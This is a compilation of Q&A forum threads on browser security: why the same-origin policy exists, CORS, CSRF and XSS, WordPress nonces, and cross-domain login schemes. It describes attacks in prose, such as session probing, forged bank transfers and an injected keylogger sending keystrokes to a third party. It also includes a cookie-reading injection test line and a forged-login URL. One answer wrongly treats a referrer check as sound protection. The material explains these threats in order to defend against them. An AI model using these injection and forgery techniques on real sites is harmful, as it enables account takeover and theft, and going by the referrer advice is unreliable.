What are some of the examples of the attacks that could be made if it were possible?
I run a website that gives away the best free pornography in town. People flock to it.
As they are browsing and viewing the spectacle of colours and moving imagery, an AJAX request works it's way through a list of domains seeing if you are logged in to any of them.
Any you are logged into, it send another ajax request to a page on my site that saves any of the data it has found. This way it could steal private information.
Or, it can post data to forms on those pages, along the lines of "send me £1000 from your bank plz k thx".
http://en.wikipedia.org/wiki/Same_origin_policy
Why the cross-domain Ajax is a security concern?
Cross Site Scripting (XSS), and Cross Site Request Forgery (CSRF)
XSS is injecting 3rd party code from a secondary site to alter the function of the first, usually SCRIPT tags. The trust on AJAX related code is quite high as it is, you'd have to trust that a third party site would always return the same information, and that your Javascript was capable of protecting against malformed input. It's fairly easy to demonstrate a remote Javascript library rewriting an entire page.
CSRF attacks on third party AJAX would be rife. You log on to a site, and it attempts to post information to sites, hoping you are logged in.
The biggest, and most evil thing you could do is a combination of both. Through an insecure text entry, you XSS in some Javascript, that creates KeyListener, that buffers and then sends via AJAX to a third party. Course, this is technically possible as is, and you could use it to capture logins, possibly and though I've yet to proof it... I suspect you could do this with loading of images and passing through extra key presses in the query string. The target image on the 3rd party domain is a handling script which then logs.
I suspect you would also be able to Hijack Sessions this way, as you may be able to gain Session Identifiers from the remote computer to pass back.
Of course, a coder would be able to protect against these, it is just facilitates quite a large bag of evil.
Related
Recently I got person ask me why our website doesn't work without cookies. My explanation is we need to save tokens and some reference in cookie, So that later on we can use it to make requests and there is limit options that we can use to save data in browser. But he doesn't satisfied with my answer and I also think there is a few options that we can make it work instead of using cookies/localStorage/sessionStorage.
My question is why most of the website cannot work without cookies? Can we make the website works without any storage in the browser?
Using cookies allows your website to remember the user (e.g. last login, avoiding having to login again) and offer corresponding benefits to them and you (e.g. tracking usage/interest, advertising). If you don't want these benefits then of course you can deliver a website which doesn't use cookies. If the website needs a login they will have to login on every different page viewed.
I am building a wordpress plugin with ajax and am looking to protect the json data from prying eyes and data scrapers.
My thoughts... server side, I send a nonce in a hidden html field within a form submission to a jquery script.
This script requests via GET some json data from a php file.
Prior to the php file responding to the GET request it first checks that the nonce is valid and if so, returns the json data. If not, returns nothing / dies / does something cool to lock out that IP address for a certain amount of time.
If a scraper goes directly to the data file with a get request, but the incorrect nonce, no data is returned. If a person peeks into the data file, but they don't have the nonce, then they will see nothing... is this correct? I am aware that the nonce is use only once, so even if they have an old nonce, they still won't be able to view the data unless a new nonce is generated by wordpress?
Is this possible or have I completely missed the point of the nonce?
It seems to me like you have the general idea on how Wordpress nonce works, but here's some reading anyway:
Mark Jaquith - WordPress Nonces
Vladimir Prelovac - Using Nonces in WordPress Plugins
I think you need to keep in mind a few things:
If all this functionality is primarily utilized on the Admin side of Wordpress, then you have to also understand that in order for a scraper to even be considered a threat, it would require the same credentials as a normal user. How can a scraper scrape your Admin Panel without a Username and Password? It can't. If you're satisfied with the core security Wordpress employs on its own, then your additional Nonce functionality is a lot of flash and flare to eliminate a threat that doesn't exist.
If your sensitive data is to be kept apart from the Admin panel, then Nonce can be one way of securing it, I suppose, but that's really not the purpose of Nonce. There are many cleaner ways of securing your information rather than relying on Wordpress' Nonce functionality, so consider looking into a more relevant alternative.
IP Banning is neat and all, but you also have to understand that this is not a foolproof method, as IP addresses can be easily faked, and it might have some unintended consequences. You might be able to succeed in banning the IP address of somebody who attempted to access private information, but what if that person was attempting this over a Network? You've effectively banned an entire network from accessing your site, not just a single person.
All in all, you should just make sure that you're using the right tools for any particular job. I think using Nonce for this purpose is certainly possible, but it is far from ideal.
I've done a bit of reading on working around the cross domain policy, and am now aware of two ways that will work for me, but I am struggling to understand how CORS is safer than having no cross domain restriction at all.
As I understand it, the cross domain restriction was put in place because theoretically a malicious script could be inserted into a page that the user is viewing which could cause the sending of data to a server that is not associated (i.e. not the same domain) to site that the user has specifically loaded.
Now with the CORS feature, it seems like this can be worked around by the malicious guys because it's the malicous server itself that is allowed to authorises the cross domain request. So if a malicious script decides to sending details to a malicious server that has Access-Control-Allow-Origin: * set, it can now recieve that data.
I'm sure I've misunderstood something here, can anybody clarify?
I think #dystroy has a point there, but not all of what I was looking for. This answer also helped. https://stackoverflow.com/a/4851237/830431
I now understand that it's nothing to do with prevention of sending data, and more to do with preventing unauthorised actions.
For example: A site that you are logged in to (e.g. social network or bank) may have a trusted session open with your browser. If you then visit a dodgy site, they will not be able to perform a cross site scripting attack using the sites that you are logged in to (e.g. post spammy status updates, get personal details, or transfer money from your account) because of the cross domain restriction policy. The only way they would be able to perform that cross site scripting attack would be if the browser didn't have the cross site restriction enabled, or if the social network or bank had implemented CORS to include requests from untrusted domains.
If a site (e.g. bank or social network) decides to implement CORS, then they should be sure that it can't result in unauthorised actions or unauthorised data being retrieved, but something like a news website content API or yahoo pipes has nothing to lose by enabling CORS on *
You may set more precise origin filter than "*".
If you decide to open your specific page to be included in another page, it means you'll handle the consequences.
But the main problem cannot be that a server can receive strange data : that's nothing new : everything that is received by a server is suspect. The protection is mainly for the user which cannot be abused by an abnormal composition of sources (the englobing one being able to read the englobed data, for example). So if you allow all origins for a page, don't put inside data that you want to share only with your user.
Why was this policy even created? Seems to me that there are only disadvantages of this. If you want to, there are ways to access another domain (for example, JSONP). Wouldn't it be much easier for everybody if there was no such policy?
But I suppose that the guys who created it are smart and that they did it for a reason. I'd like to know this reason.
Same Origin Policy is not primarily meant to defend against Cross Site Scripting (XSS) as stated above but to hinder Cross Site Request Forgery (CSRF).
A malicious site shall not be able to load data from other sites unless this is allowed by that other host explicitly.
E.g. When I browse www.malicious.com I would not want it to be able to access my concurrent authenticated session at www.mybank.com, request some of my data from the bank's AJAX interface and send it to malicious.com using my browser as relay.
To bypass this restriction for intended use or public information the Cross-Origin Resource Sharing (CORS) protocol has been implemented in modern browsers.
Security.
If it didn't exist, and your site accepted input from a user, I could do bad things. For example, I could put some javascript in the text I entered on your site, that did an ajax call to my domain. When anyone viewed my input (like on SO, when we view your question), that javascript would execute. I could look at how your website worked in my inspector, add observers to your input, and steal your users' data.
The same origin policy prevents me from sending your data to my domain via ajax. To see how easy it is, if you have a simple website, just put the following in one of your forms and submit the data.
javascript:alert(document.cookie);
If you don't take steps to do something about that (your framework might automatically), I just injected javascript into your site, and when someone views it it will execute. (It's called javascript injection)
Now imagine I got a little more creative and added some ajax code....
The browser needs to prevent such things or using the web would be digital suicide.
Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 3 years ago.
Improve this question
I see iframe/p3p trick is the most popular one around, but I personally don't like it because javascript + hidden fields + frame really make it look like a hack job. I've also come across a master-slave approach using web service to communicate (http://www.15seconds.com/issue/971108.htm) and it seems better because it's transparent to the user and it's robust against different browsers.
Is there any better approaches, and what are the pros and cons of each?
My approach designates one domain as the 'central' domain and any others as 'satellite' domains.
When someone clicks a 'sign in' link (or presents a persistent login cookie), the sign in form ultimately sends its data to a URL that is on the central domain, along with a hidden form element saying which domain it came from (just for convenience, so the user is redirected back afterwards).
This page at the central domain then proceeds to set a session cookie (if the login went well) and redirect back to whatever domain the user logged in from, with a specially generated token in the URL which is unique for that session.
The page at the satellite URL then checks that token to see if it does correspond to a token that was generated for a session, and if so, it redirects to itself without the token, and sets a local cookie. Now that satellite domain has a session cookie as well. This redirect clears the token from the URL, so that it is unlikely that the user or any crawler will record the URL containing that token (although if they did, it shouldn't matter, the token can be a single-use token).
Now, the user has a session cookie at both the central domain and the satellite domain. But what if they visit another satellite? Well, normally, they would appear to the satellite as unauthenticated.
However, throughout my application, whenever a user is in a valid session, all links to pages on the other satellite domains have a ?s or &s appended to them. I reserve this 's' query string to mean "check with the central server because we reckon this user has a session". That is, no token or session id is shown on any HTML page, only the letter 's' which cannot identify someone.
A URL receiving such an 's' query tag will, if there is no valid session yet, do a redirect to the central domain saying "can you tell me who this is?" by putting something in the query string.
When the user arrives at the central server, if they are authenticated there the central server will simply receive their session cookie. It will then send the user back to the satellite with another single use token, which the satellite will treat just as a satellite would after logging in (see above). Ie, the satellite will now set up a session cookie on that domain, and redirect to itself to remove the token from the query string.
My solution works without script, or iframe support. It does require '?s' to be added to any cross-domain URLs where the user may not yet have a cookie at that URL. I did think of a way of getting around this: when the user first logs in, set up a chain of redirects around every single domain, setting a session cookie at each one. The only reason I haven't implemented this is that it would be complicated in that you would need to be able to have a set order that these redirects would happen in and when to stop, and would prevent you from expanding beyond 15 domains or so (too many more and you become dangerously close to the 'redirect limit' of many browsers and proxies).
Follow up note: this was written 11 years ago when the web was very different - for example, XMLhttprequest was not regarded as something you could depend on, much less across domains.
That's a good solution if you have full-control of all the domains backend. In my situation I only have client (javascript/html) control on one, and full-control on another, therefore I need to use the iframe/p3p method, which sucks :(.
Ok I seem to have found a solution, you can create a script tag that loads the src of the domain you want to set/get cookies on... only safari so far seems not to be able to SET cookies, but Ie6 and FF work fine... still if you only want to GET cookies, this is a very good approach.
The example in that article seems suspicious to me because you basically redirect to a url which, in turn, passes variables back to your domain in a querystring.
In the example, that would mean that a malicious user could simply navigate to http://slave.com/return.asp?Return=blah&UID=123" and be logged in on slave.com as user 123.
Am I missing something, or is it well-known that this technique is insecure and shouldn't be used for, well, things like that example suggests (passing user id's around, presumably to make one's identity portable).
#thomasrutter
You could avoid having to manage all outbound links on satellites (via appending "s" to querystring) by making an ajax call to check the 'central' domain for auth status on page load. You could avoid redundant calls (on subsequent page loads) by making only one per session.
It would be arguably better to make the auth check request server-side prior to page load so that (a) you have more efficient access to session, and (b) you will know upon page render whether or not the user is logged in (and display content accordingly).
We use cookie chaining, but it's not a good solution since it breaks when one of the domains doesn't work for the user (due to filtering / firewalls etc.). The newer techniques (including yours) only break when the "master" server that hands out the cookies / manages logins breaks.
Note that your return.asp can be abused to redirect to any site (see this for example).
You also should validate active session information against domains b,c,d,... this way you can only login if the user has already logged in at domain a.
What you do is on the domain receiving the variables you check the referrer address as well so you can confirm the link was from your own domain and not someone simply typing the link into the address bar. This approach works well.